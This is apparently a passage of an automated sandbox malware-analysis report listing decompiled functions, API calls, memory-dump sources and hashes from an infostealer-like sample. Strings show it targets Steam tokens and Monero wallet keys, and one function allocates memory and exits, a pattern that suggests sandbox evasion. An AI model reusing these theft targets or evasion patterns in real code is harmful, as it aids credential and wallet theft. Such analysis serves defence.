Part of subcall function 6C5835A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C58363F
Part of subcall function 6C5835A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C58369F
Part of subcall function 6C5835A0: __aulldiv.LIBCMT ref: 6C5836E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C58309F

Part of subcall function 6C5A5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5A56EE,?,00000001), ref: 6C5A5B85
Part of subcall function 6C5A5B50: EnterCriticalSection.KERNEL32(6C60F688,?,?,?,6C5A56EE,?,00000001), ref: 6C5A5B90
Part of subcall function 6C5A5B50: LeaveCriticalSection.KERNEL32(6C60F688,?,?,?,6C5A56EE,?,00000001), ref: 6C5A5BD8
Part of subcall function 6C5A5B50: GetTickCount64.KERNEL32 ref: 6C5A5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C5830BE

Part of subcall function 6C5830F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C583127
Part of subcall function 6C5830F0: __aulldiv.LIBCMT ref: 6C583140

Part of subcall function 6C5BAB2A: __onexit.LIBCMT ref: 6C5BAB30

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 535f1a275e81da6e1b61a91805af3cebe1190cf00398d4e78f332369611ba8d2
Instruction ID: 81bc1c80892ed7bac5aa6b1f7c17b7ebf136c7a24cdca1aa35dcdc0a53420fda
Opcode Fuzzy Hash: 535f1a275e81da6e1b61a91805af3cebe1190cf00398d4e78f332369611ba8d2
Instruction Fuzzy Hash: A5F0A222F3074896CB10DF758D911A6B770AFAA214F50171DE84573551FB2066D8838A

Function 003D9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 003D9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003D94A5
CloseHandle.KERNEL32(00000000), ref: 003D94AF

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 465f5331e4d6c2e305e293be3e481fb2081a1455ab23f51b1cab2c5c588eb019
Instruction ID: da306c7f2b3e0923b0cda3fafb03d2730e143e8166468697f17911ebd4ed40b1
Opcode Fuzzy Hash: 465f5331e4d6c2e305e293be3e481fb2081a1455ab23f51b1cab2c5c588eb019
Instruction Fuzzy Hash: 36F03A7594020CABDB05DFE4DD4AFEA7778EB08300F008498BA099B290D6B06E85CB91

Function 003C1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003C112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 003C1132
ExitProcess.KERNEL32 ref: 003C1143

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b5f510741f78b28b4e481b56a3d383c62280a0548f54246197fa78d907d8d826
Instruction ID: e8610347a8734a078e5cb94da2fc43408fc3296a9d86d92182e74b233138d980
Opcode Fuzzy Hash: b5f510741f78b28b4e481b56a3d383c62280a0548f54246197fa78d907d8d826
Instruction Fuzzy Hash: E6E0E6709C5308FBE7106BE09C0AF097779AB05B41F105059F709BA1D1D6B56A40A799

Function 003C6D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d0040b3b2ff6619840d5664a6dc40c0bf98c2e580f2cbc3381a096013cb5f0d
Instruction ID: 1cff17bb3e7190717a4a6490cd0d1678de414d81ac64be7d0f8b39acef8f0c98
Opcode Fuzzy Hash: 2d0040b3b2ff6619840d5664a6dc40c0bf98c2e580f2cbc3381a096013cb5f0d
Instruction Fuzzy Hash: 136136B4900218DFCB15DF94E98AFEEB7B4BB08304F10859DE419AB281D735AE94DF91

Function 003D5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA820: lstrlen.KERNEL32(003C4F05,?,?,003C4F05,003E0DDE), ref: 003DA82B
Part of subcall function 003DA820: lstrcpy.KERNEL32(003E0DDE,00000000), ref: 003DA885

lstrlen.KERNEL32(00000000,00000000,003E0ACA), ref: 003D512A

Strings

steam_tokens.txt, xrefs: 003D513F

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 87bed4ebfd1b22516bee3eb66c34e253ead5ce997fd7c7cdcc4c80df7bec2bf4
Instruction ID: e2c3fb26258858d87bf0c53b6183e9c0402e9ae5673181e8aa604ae46053629e
Opcode Fuzzy Hash: 87bed4ebfd1b22516bee3eb66c34e253ead5ce997fd7c7cdcc4c80df7bec2bf4
Instruction Fuzzy Hash: DFF04B7280050866CB06FBB0ED529ED773C9A10300F40422AB8526A292EF346A09D7A2

Function 003D7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(003E0E2C), ref: 003D7F00
wsprintfA.USER32 ref: 003D7F16

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 0937451cd2f8e26f8208181ffc050d980be336fa939e4e01983953faad290ac1
Instruction ID: 292a21ef71ae9b9e72f86810fd3b257b7d44cefb1ecdecd6151abc8e2291e760
Opcode Fuzzy Hash: 0937451cd2f8e26f8208181ffc050d980be336fa939e4e01983953faad290ac1
Instruction Fuzzy Hash: 20F0F6B2944208EBC710CF94EC45FEAF7BCFB44714F00066AF50492280D37519008BD1

Function 003CB4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

lstrlen.KERNEL32(00000000), ref: 003CB9C2
lstrlen.KERNEL32(00000000), ref: 003CB9D6

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 14897deddd551f4a35611ea54174773dd483be1a42bb692112c11c48f30e026a
Instruction ID: ffccb256f6f416a37d9332fe6aadd719c14c236d030af05896d95bfa33e42332
Opcode Fuzzy Hash: 14897deddd551f4a35611ea54174773dd483be1a42bb692112c11c48f30e026a
Instruction Fuzzy Hash: 82E133738105589BCB06FBA0EE92EEE7739BF14300F40415AF506AA191EF346B49DB66

Function 003CAEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

lstrlen.KERNEL32(00000000), ref: 003CB16A
lstrlen.KERNEL32(00000000), ref: 003CB17E

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: acafbaac5e23415c984f38ba2645a4bcb8b0a2aed5c7d96f0e1d559deaec1382
Instruction ID: e2cf477e357b834df4b49bed1bc95b9f47ca57f0741e0a492220ad2d10f2dd90
Opcode Fuzzy Hash: acafbaac5e23415c984f38ba2645a4bcb8b0a2aed5c7d96f0e1d559deaec1382
Instruction Fuzzy Hash: F39157739105589BCF06FBA0ED92EEE7779BF14300F40411AF507AA291EF346A09DB66

Function 003CB230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

